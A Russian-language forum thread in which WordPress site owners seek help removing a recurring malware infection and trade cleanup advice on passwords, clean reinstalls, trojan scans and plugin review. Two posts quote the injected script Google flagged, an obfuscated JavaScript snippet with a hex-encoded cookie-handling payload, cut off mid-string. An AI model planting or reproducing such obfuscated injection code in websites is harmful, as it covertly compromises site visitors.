• DONATE to NULLED!
    Вы можете помочь Форуму и команде, поддержать финансово.
    starwanderer - модератор этого раздела будет Вам благодарен!

Помощь Как бороться с таким вирусом на Wordpress?

djchange

Постоялец
Регистрация
6 Окт 2010
Сообщения
123
Реакции
14
Установлен WordPress 4.3.1, посадили вируса, который постоянно плодит файлы с вирусами.
Хостинг постоянно ругается на эти файлы, удаляю их, но они появляются снова.
Установил Block Bad Queries (BBQ) и BulletProof Security, но уже не спасает, очевидно где-то прописан скрипт, который плодит эти файлы.
Как с этим бороться?

Снимок экрана 2015-12-21 в 12.09.22.png
 
Помогите найти вирус на сайте. Гугл прислал сообщение о том что на сайте вирус и прислал вот такой подозрительный код:

Код:
<script type="text/javascript">(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }/*f1c7bb7ab75278bd724369f42f929849*/;(function(){var ryzfesky="";var tdfdhnyn="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d

Перезалил новый Wordpress на хост. Не помогло. Удалил все плагины тоже самое. Куда еще копать?
 
Помогите найти вирус на сайте. Гугл прислал сообщение о том что на сайте вирус и прислал вот такой подозрительный код:

Код:
<script type="text/javascript">(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }/*f1c7bb7ab75278bd724369f42f929849*/;(function(){var ryzfesky="";var tdfdhnyn="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d

Перезалил новый Wordpress на хост. Не помогло. Удалил все плагины тоже самое. Куда еще копать?
Поменяй пароли доступа для начала, и потом после перезаливки чистой вп надо немного пождать - ведь гугл не сразу видит чистоту. Ведь сразу сам по себе скрипт не пропишется - если все удалили. Если заливали поверх зараженной копии - то ничего не изменится.
 
Поменяй пароли доступа для начала, и потом после перезаливки чистой вп надо немного пождать - ведь гугл не сразу видит чистоту. Ведь сразу сам по себе скрипт не пропишется - если все удалили. Если заливали поверх зараженной копии - то ничего не изменится.

Так и сделал. Удалил все. Залил новый WP, последнюю версию темы и все обновленные плагины. Потом Гуглу на проверку и пока полет норм.
 
К сожалению все опять вернулось. Снова этот дурацкий код появился(( Где он может еще сидеть? Или как он опять там появился? Пароли все сменил.
Машинку с которой работаешь - проверь на шпион вирусо троянские западлянки. Ибо тоже вариант как и куда сливается. Либо проблема в каком-то плагине - в котором дыра дирищем.
 
Машинку с которой работаешь - проверь на шпион вирусо троянские западлянки. Ибо тоже вариант как и куда сливается. Либо проблема в каком-то плагине - в котором дыра дирищем.
Машину как раз сейчас проверяю, а список плагинов вот что могу сказать:
Advertising Manager - - скопирован с компа
Akismet - скачан с WP
All In One WP Security - скачан с WP
Broken Link Checker - скачан с WP
Contact Form 7 - скачан с WP
Dagon Design Sitemap Generator - скопирован с компа
Disable All WordPress Updates - скачан с WP
Easy Social Share Buttons for WordPress - нашел в инете
Exploit Scanner - скачан с WP
FD Feedburner Plugin - скопирован с компа
Feed Pauser - скопирован с компа
Google XML Sitemaps - скачан с WP
MailChimp для WordPress - скачан с WP
MP3-jPlayer - скачан с WP
Optimize Database after Deleting Revisions - скачан с WP
Related Posts - скачан с WP
Relevanssi - скопирован с компа
RusToLat - скопирован с компа
Simple Tags - скачан с WP
Subscribe To Comments - скачан с WP
Theme Authenticity Checker (TAC) - скопирован с компа
WordPress Database Backup - скачан с WP
WordPress SEO - скопирован с компа
WP-PostRatings - скачан с WP
WP-PostViews - скачан с WP
ВП Типограф Лайт - скопирован с компа
WP-PageNavi - скачан с WP
 
Машину как раз сейчас проверяю, а список плагинов вот что могу сказать:
Advertising Manager - - скопирован с компа
Akismet - скачан с WP
All In One WP Security - скачан с WP
Broken Link Checker - скачан с WP
Contact Form 7 - скачан с WP
Dagon Design Sitemap Generator - скопирован с компа
Disable All WordPress Updates - скачан с WP
Easy Social Share Buttons for WordPress - нашел в инете
Exploit Scanner - скачан с WP
FD Feedburner Plugin - скопирован с компа
Feed Pauser - скопирован с компа
Google XML Sitemaps - скачан с WP
MailChimp для WordPress - скачан с WP
MP3-jPlayer - скачан с WP
Optimize Database after Deleting Revisions - скачан с WP
Related Posts - скачан с WP
Relevanssi - скопирован с компа
RusToLat - скопирован с компа
Simple Tags - скачан с WP
Subscribe To Comments - скачан с WP
Theme Authenticity Checker (TAC) - скопирован с компа
WordPress Database Backup - скачан с WP
WordPress SEO - скопирован с компа
WP-PostRatings - скачан с WP
WP-PostViews - скачан с WP
ВП Типограф Лайт - скопирован с компа
WP-PageNavi - скачан с WP
Ох ты ну них....орошо как много... чуть позже просмотрю что там извесно на счет них и дыр последненайденных.
 
Назад
Сверху